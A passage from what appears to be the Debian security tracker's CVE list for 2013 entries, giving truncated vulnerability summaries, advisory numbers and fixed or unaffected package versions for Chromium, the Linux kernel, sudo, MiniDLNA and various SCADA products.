Unicode ( ...) {DSA-2786-1 DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser - icu 4.8.1.1-13+nmu1 (bug #726477) CVE-2013-2923 (Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599 ...) 
{DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2922 (Use-after-free vulnerability in core/html/HTMLTemplateElement.cpp in B ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2921 (Double free vulnerability in the ResourceFetcher::didLoadResource func ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2920 (The DoResolveRelativeHost function in url/url_canon_relative.cc in Goo ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2919 (Google V8, as used in Google Chrome before 30.0.1599.66, allows remote ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-2918 (Use-after-free vulnerability in the RenderBlock::collapseAnonymousBloc ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2917 (The ReverbConvolverStage::ReverbConvolverStage function in core/platfo ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2916 (Blink, as used in Google Chrome before 30.0.1599.66, allows remote att ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2915 (Google Chrome before 30.0.1599.66 preserves pending NavigationEntry ob ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2914 (Use-after-free vulnerability in the color-chooser dialog in Google Chr ...) - chromium-browser (windows-specific issue) CVE-2013-2913 (Use-after-free vulnerability in the XMLDocumentParser::append function ...) 
{DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2912 (Use-after-free vulnerability in the PepperInProcessRouter::SendToHost ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2911 (Use-after-free vulnerability in the XSLStyleSheet::compileStyleSheet f ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2910 (Use-after-free vulnerability in modules/webaudio/AudioScheduledSourceN ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2909 (Use-after-free vulnerability in Blink, as used in Google Chrome before ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2908 (Google Chrome before 30.0.1599.66 uses incorrect function calls to det ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2907 (The Window.prototype object implementation in Google Chrome before 30. ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2906 (Multiple race conditions in the Web Audio implementation in Blink, as ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2905 (The SharedMemory::Create function in memory/shared_memory_posix.cc in ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2904 (Use-after-free vulnerability in the Document::finishedParsing function ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2903 (Use-after-free vulnerability in the HTMLMediaElement::didMoveToNewDocu ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2902 (Use-after-free vulnerability in the XSLT ProcessingInstruction impleme ...) 
{DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser - libxslt (according to https://chromiumcodereview.appspot.com/20856002 this is an issue on chromium's side of xslt handling) CVE-2013-2901 (Multiple integer overflows in (1) libGLESv2/renderer/Renderer9.cpp and ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2900 (The FilePath::ReferencesParent function in files/file_path.cc in Googl ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2899 (drivers/hid/hid-picolcd_core.c in the Human Interface Device (HID) sub ...) - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (driver introduced in 2.6.35) CVE-2013-2898 (drivers/hid/hid-sensor-hub.c in the Human Interface Device (HID) subsy ...) - linux 3.10.11-1 (low) [wheezy] - linux (driver introduced in 3.7) - linux-2.6 (driver introduced in 3.7) CVE-2013-2897 (Multiple array index errors in drivers/hid/hid-multitouch.c in the Hum ...) - linux 3.11.5-1 (low) - linux-2.6 (driver introduced in 2.6.38) [wheezy] - linux 3.2.53-1 CVE-2013-2896 (drivers/hid/hid-ntrig.c in the Human Interface Device (HID) subsystem ...) - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (Vulnerable feature probing code not present) CVE-2013-2895 (drivers/hid/hid-logitech-dj.c in the Human Interface Device (HID) subs ...) - linux 3.11.5-1 (low) - linux-2.6 (driver introduced in 3.2) [wheezy] - linux 3.2.53-1 CVE-2013-2894 (drivers/hid/hid-lenovo-tpkbd.c in the Human Interface Device (HID) sub ...) - linux 3.11.5-1 (low) [wheezy] - linux (driver introduced in 3.6) - linux-2.6 (driver introduced in 3.6) CVE-2013-2893 (The Human Interface Device (HID) subsystem in the Linux kernel through ...) {DSA-2906-1} - linux 3.11.5-1 (low) - linux-2.6 (low) [wheezy] - linux 3.2.53-1 CVE-2013-2892 (drivers/hid/hid-pl.c in the Human Interface Device (HID) subsystem in ...) 
{DSA-2766-1} - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (low) CVE-2013-2891 (drivers/hid/hid-steelseries.c in the Human Interface Device (HID) subs ...) - linux 3.11.5-1 (low) [wheezy] - linux (steelseries driver introduced in 3.9) - linux-2.6 (steelseries driver introduced in 3.9) CVE-2013-2890 (drivers/hid/hid-sony.c in the Human Interface Device (HID) subsystem i ...) - linux (buzz driver introduced in 3.11 cycle, only in experimental) - linux-2.6 (buzz driver introduced in 3.11 cycle) CVE-2013-2889 (drivers/hid/hid-zpff.c in the Human Interface Device (HID) subsystem i ...) {DSA-2906-1} - linux 3.11.5-1 (low) - linux-2.6 (low) [wheezy] - linux 3.2.53-1 CVE-2013-2888 (Multiple array index errors in drivers/hid/hid-core.c in the Human Int ...) {DSA-2766-1} - linux 3.10.11-1 - linux-2.6 [wheezy] - linux 3.2.51-1 CVE-2013-2887 (Multiple unspecified vulnerabilities in Google Chrome before 29.0.1547 ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2886 (Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500 ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2885 (Use-after-free vulnerability in Google Chrome before 28.0.1500.95 allo ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2884 (Use-after-free vulnerability in the DOM implementation in Google Chrom ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2883 (Use-after-free vulnerability in Google Chrome before 28.0.1500.95 allo ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2882 (Google V8, as used in Google Chrome before 28.0.1500.95, allows remote ...) 
	{DSA-2732-1}
	- chromium-browser 28.0.1500.95-1
	[squeeze] - chromium-browser
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-2881 (Google Chrome before 28.0.1500.95 does not properly handle frames, whi ...)
	{DSA-2732-1}
	- chromium-browser 28.0.1500.95-1
	[squeeze] - chromium-browser
CVE-2013-2880 (Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500 ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2879 (Google Chrome before 28.0.1500.71 does not properly determine the circ ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2878 (Google Chrome before 28.0.1500.71 allows remote attackers to cause a d ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2877 (parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0 ...)
	{DSA-2779-1 DSA-2724-1}
	- libxml2 2.9.1+dfsg1-1 (bug #715531)
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2876 (browser/extensions/api/tabs/tabs_api.cc in Google Chrome before 28.0.1 ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2875 (core/rendering/svg/SVGInlineTextBox.cpp in the SVG implementation in B ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2874 (Google Chrome before 28.0.1500.71 on Windows, when an Nvidia GPU is us ...)
	- chromium-browser (Windows-specific)
	[squeeze] - chromium-browser
CVE-2013-2873 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2872 (Google Chrome before 28.0.1500.71 on Mac OS X does not ensure a suffic ...)
	- chromium-browser (MacOS specific)
CVE-2013-2871 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2870 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2869 (Google Chrome before 28.0.1500.71 allows remote attackers to cause a d ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2868 (common/extensions/sync_helper.cc in Google Chrome before 28.0.1500.71 ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2867 (Google Chrome before 28.0.1500.71 does not properly prevent pop-under ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2866 (The Flash plug-in in Google Chrome before 27.0.1453.116, as used on Go ...)
	- chromium-browser (Flash plugin not included in Chromium)
CVE-2013-2865 (Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453 ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2864 (The PDF functionality in Google Chrome before 27.0.1453.110 allows rem ...)
	- chromium-browser (PDF viewer not included in Chromium)
CVE-2013-2863 (Google Chrome before 27.0.1453.110 does not properly handle SSL socket ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2862 (Skia, as used in Google Chrome before 27.0.1453.110, does not properly ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2861 (Use-after-free vulnerability in the SVG implementation in Google Chrom ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2860 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2859 (Google Chrome before 27.0.1453.110 allows remote attackers to bypass t ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2858 (Use-after-free vulnerability in the HTML5 Audio implementation in Goog ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2857 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2856 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2855 (The Developer Tools API in Google Chrome before 27.0.1453.110 allows r ...)
	{DSA-2706-1}
	- chromium-browser 27.0.1453.110-1
	[squeeze] - chromium-browser
CVE-2013-2854 (Google Chrome before 27.0.1453.110 on Windows provides an incorrect ha ...)
	- chromium-browser (Windows-specific)
CVE-2013-2853 (The HTTPS implementation in Google Chrome before 28.0.1500.71 does not ...)
	{DSA-2724-1}
	- chromium-browser 28.0.1500.71-1
	[squeeze] - chromium-browser
CVE-2013-2852 (Format string vulnerability in the b43_request_firmware function in dr ...)
	{DSA-2766-1 DSA-2745-1}
	- linux 3.9.8-1 (low)
	- linux-2.6 (low)
CVE-2013-2851 (Format string vulnerability in the register_disk function in block/gen ...)
	{DSA-2766-1 DSA-2745-1}
	- linux 3.9.8-1 (low)
	- linux-2.6 (low)
CVE-2013-2850 (Heap-based buffer overflow in the iscsi_add_notunderstood_response fun ...)
	- linux 3.9.4-1
	- linux-2.6 (Introduced in 3.1)
	[wheezy] - linux 3.2.46-1
CVE-2013-2849 (Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome b ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2848 (The XSS Auditor in Google Chrome before 27.0.1453.93 might allow remot ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2847 (Race condition in the workers implementation in Google Chrome before 2 ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2846 (Use-after-free vulnerability in the media loader in Google Chrome befo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2845 (The Web Audio implementation in Google Chrome before 27.0.1453.93 allo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2844 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) imple ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2843 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2842 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2841 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2840 (Use-after-free vulnerability in the media loader in Google Chrome befo ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2839 (Google Chrome before 27.0.1453.93 does not properly perform a cast of ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2838 (Google V8, as used in Google Chrome before 27.0.1453.93, allows remote ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-2837 (Use-after-free vulnerability in the SVG implementation in Google Chrom ...)
	{DSA-2695-1}
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2836 (Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453 ...)
	- chromium-browser 27.0.1453.93-1
	[squeeze] - chromium-browser
CVE-2013-2835 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...)
	NOT-FOR-US: Google Chrome OS
CVE-2013-2834 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...)
	NOT-FOR-US: Google Chrome OS
CVE-2013-2833 (Use-after-free vulnerability in the O3D plug-in in Google Chrome OS be ...)
	NOT-FOR-US: Google Chrome OS
CVE-2013-2832 (The Buffer::Set function in core/cross/buffer.cc in the O3D plug-in in ...)
	NOT-FOR-US: Google Chrome OS
CVE-2013-2831 RESERVED
CVE-2013-2830 (Use-after-free vulnerability in SumatraPDF Reader 2.x before 2.2.1 all ...)
	NOT-FOR-US: SumatraPDF Reader
CVE-2013-2829 (MatrikonOPC SCADA DNP3 OPC Server 1.2.2.0 and earlier allows remote at ...)
	NOT-FOR-US: MatrikonOPC SCADA DNP3 OPC Server
CVE-2013-2828 (The DNP Master Driver in the OSIsoft PI Interface before 3.1.2.54 for ...)
	NOT-FOR-US: OSIsoft PI Interface
CVE-2013-2827 (An unspecified ActiveX control in WellinTech KingSCADA before 3.1.2, K ...)
	NOT-FOR-US: WellinTech KingSCADA
CVE-2013-2826 (WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and ...)
	NOT-FOR-US: WellinTech KingSCADA
CVE-2013-2825 (The DNP3 service in the Outstation component on Elecsys Director Gatew ...)
	NOT-FOR-US: Elecsys Director Gateway
CVE-2013-2824 (Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo ...)
	NOT-FOR-US: Schneider Electric StruxureWare SCADA Expert Vijeo Citect
CVE-2013-2823 (The (1) Catapult DNP3 I/O driver before 7.2.0.60 and the (2) GE Intell ...)
	NOT-FOR-US: Catapult DNP3 I/O driver
CVE-2013-2822 (NovaTech Orion Substation Automation Platform OrionLX DNP Master 1.27. ...)
	NOT-FOR-US: NovaTech
CVE-2013-2821 (NovaTech Orion Substation Automation Platform OrionLX DNP Master 1.27. ...)
	NOT-FOR-US: NovaTech
CVE-2013-2820 (The Sierra Wireless AirLink Raven X EV-DO gateway 4221_4.0.11.003 and ...)
	NOT-FOR-US: Sierra Wireless AirLink Raven X EV-DO gateways
CVE-2013-2819 (The Sierra Wireless AirLink Raven X EV-DO gateway 4221_4.0.11.003 and ...)
	NOT-FOR-US: Sierra Wireless AirLink Raven X EV-DO gateways
CVE-2013-2818 (The DNP Master Driver in Alstom e-terracontrol 3.5, 3.6, and 3.7 allow ...)
	NOT-FOR-US: e-terracontrol
CVE-2013-2817 (An ActiveX control in IcoLaunch.dll in Mitsubishi Electric Automation ...)
	NOT-FOR-US: Mitsubishi Electric Automation MC-WorX Suite
CVE-2013-2816 (The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateway ...)
	NOT-FOR-US: Cooper Power Systems
CVE-2013-2815 REJECTED
CVE-2013-2814 (Cooper Power Systems Cybectec DNP3 Master OPC Server allows remote att ...)
	NOT-FOR-US: Cooper Power Systems
CVE-2013-2813 (The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateway ...)
	NOT-FOR-US: Cooper Power Systems
CVE-2013-2812 RESERVED
CVE-2013-2811 (The (1) Catapult DNP3 I/O driver before 7.2.0.60 and the (2) GE Intell ...)
	NOT-FOR-US: Catapult DNP3 I/O driver
CVE-2013-2810 (Emerson Process Management ROC800 RTU with software 3.50 and earlier, ...)
	NOT-FOR-US: Emerson
CVE-2013-2809 (The DNP Master Driver in the OSIsoft PI Interface before 3.1.2.54 for ...)
	NOT-FOR-US: OSIsoft PI Interface
CVE-2013-2808 (Heap-based buffer overflow in Xper in Philips Xper Information Managem ...)
	NOT-FOR-US: Xper
CVE-2013-2807 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...)
	NOT-FOR-US: Rockwell Automation
CVE-2013-2806 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...)
	NOT-FOR-US: Rockwell Automation
CVE-2013-2805 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...)
	NOT-FOR-US: Rockwell Automation
CVE-2013-2804 (The DNP Master Driver in Software Toolbox TOP Server before 5.12.140.0 ...)
	NOT-FOR-US: TOP Server OPC Server
CVE-2013-2803 (ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG a ...)
	NOT-FOR-US: ProSoft RadioLinx ControlScape
CVE-2013-2802 (The universal protocol implementation in Sixnet UDR before 2.0 and RTU ...)
	NOT-FOR-US: Sixnet
CVE-2013-2801 (The OSIsoft PI Interface for IEEE C37.118 before 1.0.6.158 allows remo ...)
	NOT-FOR-US: OSIsoft PI Interface
CVE-2013-2800 (The OSIsoft PI Interface for IEEE C37.118 before 1.0.6.158 allows remo ...)
	NOT-FOR-US: OSIsoft PI Interface
CVE-2013-2799 REJECTED
CVE-2013-2798 (Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL- ...)
	NOT-FOR-US: Schweitzer Engineering Laboratories
CVE-2013-2797 RESERVED
CVE-2013-2796 (Schneider Electric Vijeo Citect 7.20 and earlier, CitectSCADA 7.20 and ...)
	NOT-FOR-US: Schneider Electric Vijeo Citect
CVE-2013-2795 REJECTED
CVE-2013-2794 (Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DN ...)
	NOT-FOR-US: Triangle MicroWorks SCADA
CVE-2013-2793 (Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DN ...)
	NOT-FOR-US: Triangle MicroWorks SCADA
CVE-2013-2792 (Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL- ...)
	NOT-FOR-US: Schweitzer Engineering Laboratories
CVE-2013-2791 (MatrikonOPC SCADA DNP3 OPC Server 1.2.0 allows remote attackers to cau ...)
	NOT-FOR-US: MatrikonOPC
CVE-2013-2790 (The master-station DNP3 driver before driver19.exe, and Beta2041.exe, ...)
	NOT-FOR-US: IOServer
CVE-2013-2789 (The Kepware DNP Master Driver for the KEPServerEX Communications Platf ...)
	NOT-FOR-US: Kepware
CVE-2013-2788 (The DNP3 Slave service in SUBNET Solutions SubSTATION Server 2.7.0033 ...)
	NOT-FOR-US: SUBNET Solutions SubSTATION Server
CVE-2013-2787 (Alstom e-terracontrol 3.5, 3.6, and 3.7 allows remote attackers to cau ...)
	NOT-FOR-US: Alstom e-terracontrol
CVE-2013-2786 (Alstom Grid MiCOM S1 Agile before 1.0.3 and Alstom Grid MiCOM S1 Studi ...)
	NOT-FOR-US: Alstom Grid MiCOM S1
CVE-2013-2785 (Multiple buffer overflows in CimWebServer.exe in the WebView component ...)
	NOT-FOR-US: GE Intelligent Platforms
CVE-2013-2784 (Triangle Research International (aka Tri) Nano-10 PLC devices with fir ...)
	NOT-FOR-US: Triangle Research International
CVE-2013-2783 (The DNP3 driver in IOServer drivers 1.0.19.0 allows remote attackers t ...)
	NOT-FOR-US: IOServer DNP3 drivers
CVE-2013-2782 (Schneider Electric Trio J-Series License Free Ethernet Radio with firm ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-2781 (Use-after-free vulnerability in the server application in 3S CODESYS G ...)
	NOT-FOR-US: 3S CODESYS Gateway
CVE-2013-2780 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cau ...)
	NOT-FOR-US: Siemens SIMATIC
CVE-2013-2779 (Cisco IOS XE 3.4 before 3.4.5S, and 3.5 through 3.7 before 3.7.1S, on ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-2778 (Cross-site request forgery (CSRF) vulnerability in addressbook/registe ...)
	NOT-FOR-US: PHP Address Book
CVE-2013-2777 (sudo before 1.7.10p5 and 1.8.x before 1.8.6p6, when the tty_tickets op ...)
	{DSA-2642-1}
	- sudo 1.8.5p2-1+nmu1 (bug #701839)
CVE-2013-2776 (sudo 1.3.5 through 1.7.10p5 and 1.8.0 through 1.8.6p6, when running on ...)
	{DSA-2642-1}
	- sudo 1.8.5p2-1+nmu1 (bug #701839)
CVE-2013-2775 RESERVED
CVE-2013-2774 RESERVED
CVE-2013-2773 (Nitro PDF 8.5.0.26: A specially crafted DLL file can facilitate Arbitr ...)
	NOT-FOR-US: Nitro PDF
CVE-2013-2772 RESERVED
CVE-2013-2771 RESERVED
CVE-2013-2770 (The installation functionality in the Novell Kanaka component before 2 ...)
	NOT-FOR-US: Novell Open Enterprise Server (OES) on Mac OS X
CVE-2013-2769 RESERVED
CVE-2013-2768 RESERVED
CVE-2013-2767 (Unspecified vulnerability in Citrix NetScaler Access Gateway Enterpris ...)
	NOT-FOR-US: Citrix NetScaler Access Gateway
CVE-2013-2766 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 ...)
	NOT-FOR-US: Splunk
CVE-2013-2765 (The ModSecurity module before 2.7.4 for the Apache HTTP Server allows ...)
	- modsecurity-apache 2.6.6-9 (bug #710217)
	- libapache-mod-security (bug #710217)
	[wheezy] - modsecurity-apache 2.6.6-6+deb7u1
	[squeeze] - libapache-mod-security 2.5.12-1+squeeze2
	NOTE: https://raw.github.com/SpiderLabs/ModSecurity/master/CHANGES
	NOTE: https://github.com/SpiderLabs/ModSecurity/commit/0840b13612a0b7ef1ce7441cf811dcfc6b463fba
CVE-2013-2764 (Secure Entry Server before 4.7.0 contains a URI Redirection vulnerabil ...)
	NOT-FOR-US: Secure Entry Server
CVE-2013-2763 (** DISPUTED ** The Schneider Electric M340 PLC modules allow remote at ...)
	NOT-FOR-US: Schneider Electric M340 modules
CVE-2013-2762 (The Schneider Electric Magelis XBT HMI controller has a default passwo ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-2761 (The Schneider Electric M340 BMXNOE01xx and BMXP3420xx PLC modules allo ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-2760 (Buffer overflow in Groovy Media Player 3.2.0 allows remote attackers t ...)
	NOT-FOR-US: Groovy Media Player
CVE-2013-2759 RESERVED
CVE-2013-2758 (Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerl ...)
	NOT-FOR-US: CloudStack
CVE-2013-2757 (Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 P ...)
	NOT-FOR-US: Citrix
CVE-2013-2756 (Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerl ...)
	NOT-FOR-US: CloudStack
CVE-2013-2755 RESERVED
CVE-2013-2754 (Cross-site request forgery (CSRF) vulnerability in Umisoft UMI.CMS bef ...)
	NOT-FOR-US: Umisoft UMI.CMS
CVE-2013-2753 RESERVED
CVE-2013-2752 (Cross-site request forgery (CSRF) vulnerability in frontview/lib/np_ha ...)
	NOT-FOR-US: NETGEAR ReadyNAS RAIDiator
CVE-2013-2751 (Eval injection vulnerability in frontview/lib/np_handler.pl in the Fro ...)
	NOT-FOR-US: NETGEAR ReadyNAS RAIDiator
CVE-2013-2750 (Cross-site scripting (XSS) vulnerability in e107_plugins/content/handl ...)
	NOT-FOR-US: e107
CVE-2013-2749 REJECTED
CVE-2013-2748 (Belkin Wemo Switch before WeMo_US_2.00.2176.PVT could allow remote att ...)
	NOT-FOR-US: Belkin
CVE-2013-2747 (The password reset feature in Courion Access Risk Management Suite Ver ...)
	NOT-FOR-US: Courion Access Risk Management Suite
CVE-2013-2746 RESERVED
CVE-2013-2745 (An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0 ...)
	- minidlna 1.1.2+dfsg-1 (low; bug #717131)
	[wheezy] - minidlna (Minor issue, DLNA only used in a trusted context)
	NOTE: http://www.securityfocus.com/archive/1/527299/30/0
CVE-2013-2744 (importbuddy.php in the BackupBuddy plugin 2.2.25 for WordPress allows ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2743 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2742 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2741 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2740 RESERVED
CVE-2013-2739 (MiniDLNA has heap-based buffer overflow ...)
	- minidlna 1.1.2+dfsg-1 (low; bug #717131)
	[wheezy] - minidlna (Minor issue, DLNA only used in a trusted context)
	NOTE: http://www.securityfocus.com/archive/1/527299/30/0
CVE-2013-2738 (minidlna has SQL Injection that may allow retrieval of arbitrary files ...)
	- minidlna 1.1.2+dfsg-1 (low; bug #717131)
	NOTE: http://www.securityfocus.com/archive/1/527299/30/0
	[wheezy] - minidlna (Minor issue, DLNA only used in a trusted context)
CVE-2013-2737 (A JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2736 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2735 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
